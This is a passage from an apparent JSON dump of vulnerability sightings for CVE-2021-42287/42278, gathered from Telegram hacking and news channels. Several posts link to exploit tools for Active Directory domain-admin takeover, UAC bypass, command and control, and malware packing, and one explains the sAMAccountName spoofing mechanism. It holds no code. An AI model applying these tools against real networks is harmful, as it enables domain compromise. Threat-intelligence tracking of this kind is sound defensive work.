CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 
\u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:15.000000Z"}, {"uuid": "3a28cb7e-810e-4870-bbe9-eaaafb1399c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2834", "content": "Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. 
This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nSysmonEnte\n\nThis is a POC attack on the integrity of Sysmon which emits a minimal amount of observable events even if a SACL is in place.\n\nTo our understanding, this attack is difficult to detect in environments where no security sensors other than Sysmon or the Windows Event Log are in use.\n\nFor more technical information on the attack and possible mitigations, please see our blogpost.\n\nhttps://github.com/codewhitesec/SysmonEnte\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nuosint\n\nFind The Profiles Of A Person On Social Networks\n\nWith this tool, you can see all the information of the target person's social networks which is publicy available. Many people thik that this tool needs to be installed, so i will make a Telegram Bot so that information can be obtained more easily and there no need to install or do any other probles just simple and easy.\n\nhttps://github.com/uosint-project/uosint\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. 
It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nVulnerable Web App\n\nsqli-postgres-rce-privesc-hacking-playground\n\nThis is free vulnerable app for novice pentesters &amp; developers to experiment with SQL Injection vulnerability and privilege escalation.\n\nRecommended path:\n\u25ab\ufe0f exploit the SQLi vulnerability\n\u25ab\ufe0f get shell via vulnerable version of PostgreSQL\n\u25ab\ufe0f perform privilage escalation and become root \ud83e\udd42\n\nhttps://github.com/filipkarc/sqli-postgres-rce-privesc-hacking-playground\n\n#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-04-03T08:51:04.000000Z"}, {"uuid": "7119ffff-f4f2-428a-91a9-7ec06969aec3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/XQnuNd5X8XmOjKF9F0Yu3FlXocPy2dUR7xXCx3NP2hXIbzk", "content": "", "creation_timestamp": "2025-04-26T23:00:05.000000Z"}, {"uuid": "e5d67f83-504a-4c8f-9d11-58a5159ca04f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/4OwSIIHM4Phzi6L1Q-57NlPfvr_pP-K8ZqCBqbr0RdiVmEc", "content": "", "creation_timestamp": "2025-04-29T17:00:10.000000Z"}, {"uuid": "8ea02106-a815-4d4d-aac4-2df675041204", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2621", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads pass file content scanners, but more importantly to avoid having Mark-Of-The-Web flag on their files. There're various motives on why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, \n\nScout Suite gathers configuration data for manual inspection and highlights risk areas. 
Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. 
It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or Out-of-band resource load by adding OAST host like Burp Collaborator to the parameter value, above of all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target, i was thinking about how can i get vulnerable parameter/endpoint , Hence i made a simple feature is that allowed you to add some pieces of information of the target in your OAST host as a variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T08:38:32.000000Z"}, {"uuid": "66063d73-92d8-40bb-a726-7faec0b1d33f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/8kfY5IrVwgv6d-jVaXidvd01teGjJ-EZbZhebbrlHOlDEw", "content": "", "creation_timestamp": "2021-12-21T02:40:26.000000Z"}, {"uuid": "2d07ae44-d75a-46f0-b99e-e5696c686a18", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/_JBB2P7ziQrNJ4Dse1MxmwqNvcRRxo6Hvl1KnPWFL1nmQa0", "content": "", "creation_timestamp": "2022-09-28T14:56:36.000000Z"}, {"uuid": "f0db1a2c-edf5-4e95-933b-f720fcf48f65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/542", "content": "#CVE-2021-42287 / #CVE-2021-42278 Scanner &amp; Exploiter\nhttps://github.com/cube0x0/noPac\n\nimpersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-12T16:04:05.000000Z"}, {"uuid": "edef5c48-208f-4811-a075-5e1dbee675c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/pGbiHzrv9DzUjPi4Cg4I-69JMs7D-lD3Hjj7tMRZSaPrsg", "content": "", "creation_timestamp": "2021-12-16T15:05:58.000000Z"}, {"uuid": "ee168a5a-82b6-45ad-a28f-9900a225b68c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/ef4wbo4l4Rv2QiVrhNHWzlDYXi82eYKt40N4lamanJL8Uw", "content": "", "creation_timestamp": "2021-12-12T21:48:33.000000Z"}, {"uuid": "4a500335-9e9c-41c4-81da-0d49b71074c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/Tim_Mafia_Hackers_lslami/1691", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 
\u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T10:47:50.000000Z"}, {"uuid": "311e81a7-9834-448d-86aa-19cd3b2c6c4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1145", "content": "CVE-2021-42287/CVE-2021-42278: impersonate DA from standard domain user\n\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 C#:\nhttps://github.com/cube0x0/noPac\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 python \u0434\u043b\u044f \u043a\u0430\u043b\u0438:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2022-01-31T01:28:15.000000Z"}, {"uuid": "351ebcf4-504d-495d-bcb8-f5b9a36cc4c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": 
"https://t.me/true_secator/2464", "content": "\u200b\u200b\u0412\u044b\u0448\u0435\u0434\u0448\u0438\u0439 \u0432 \u0441\u0432\u0435\u0442 PoC \u0434\u043b\u044f CVE-2021-42287 \u0438 CVE-2021-42278 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u043e\u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 Microsoft.\n \n\u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u044f\u0431\u0440\u044c\u0441\u043a\u0438\u043c Patch Tuesday \u043e\u0448\u0438\u0431\u043a\u0438 Active Directory \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n \nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0431\u043e\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043a\u0440\u0430\u0442\u0447\u0430\u0439\u0448\u0438\u0435 \u0441\u0440\u043e\u043a\u0438. 
IT-\u0433\u0438\u0433\u0430\u043d\u0442 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0435 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u043e \u044d\u0442\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c.\n \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-42278 \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0434\u0430\u0435\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0434\u043e 10 \u043c\u0430\u0448\u0438\u043d), \u0438 \u043a\u0430\u043a \u0435\u0433\u043e \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446, \u043e\u043d \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0430\u0442\u0440\u0438\u0431\u0443\u0442 sAMAccountName.\n \n\u0412\u0442\u043e\u0440\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 CVE-2021-42287 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 
\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 Kerberos (PAC) \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0435\u0431\u044f \u0437\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u0446\u0435\u043d\u0442\u0440 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0439 (KDC) \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0431\u0438\u043b\u0435\u0442\u044b \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u0443\u0440\u043e\u0432\u043d\u044f\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0447\u0435\u043c \u0443 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043e\u043c\u0435\u043d\u0430. 
\u042d\u0442\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e KDC \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c, \u0434\u043b\u044f \u043a\u0430\u043a\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d \u0431\u0438\u043b\u0435\u0442 \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n \n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0432 \u043e\u0431\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u044f\u043c\u043e\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u0433\u0434\u0435 \u0431\u0430\u0433\u0438 \u043d\u0435 \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u044b. 
\u041f\u043e \u0438\u0442\u043e\u0433\u0443 \u0430\u0442\u0430\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n \n\u041a\u0430\u043a \u0432\u0441\u0435\u0433\u0434\u0430, \u043c\u044b \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430\u0445 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0435 \u0438\u0441\u043f\u044b\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0443\u0434\u044c\u0431\u0443.", "creation_timestamp": "2021-12-22T14:09:17.000000Z"}, {"uuid": "a332dbb4-9884-45de-8ba9-0fe9b97ca47e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/haccking/103098", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041e\u0442 
\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u043e \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0430: CVE-2021-42278, CVE-2021-42287", "creation_timestamp": "2021-12-20T10:01:10.000000Z"}, {"uuid": "5951347b-0079-4fd3-b1ce-7d08353207cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1328", "content": "#CVE-2021\nCVE-2021-42287/CVE-2021-42278 Scanner &amp; Exploiter.\n\nhttps://github.com/cube0x0/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T20:46:13.000000Z"}, {"uuid": "790b9e74-1b53-42b3-b8cf-241854cb862d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/thehackernews/1747", "content": "Microsoft warns that two recently reported vulnerabilities \u2014 tracked as CVE-2021-42278 and CVE-2021-42287 \u2014 in Active Directory could be exploited by attackers to take over unpatched Windows domain controllers.\n\nDetails: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:04:04.000000Z"}, {"uuid": "8f816272-ee06-43c1-a9bb-2bcdf3cac7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/haccking/11425", "content": "\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434. 
CVE-2021-42278.\n\n#AD #pentest #\u0441\u0442\u0430\u0442\u044c\u044f@haccking\n\n\u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b Active Directory \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 $ \u0432 \u043a\u043e\u043d\u0446\u0435 \u0438\u043c\u0435\u043d\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430, \u0445\u043e\u0442\u044f \u0432\u0441\u0435 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043e\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0438\u043c\u0435\u043d\u043d\u043e \u0438\u043c. \u042d\u0442\u043e\u0442 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u00ab\u043d\u0435 \u0431\u0430\u0433, \u0430 \u0444\u0438\u0447\u0430\u00bb \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u043f\u043e\u043b\u043d\u0435 \u0441\u0435\u0431\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u0441 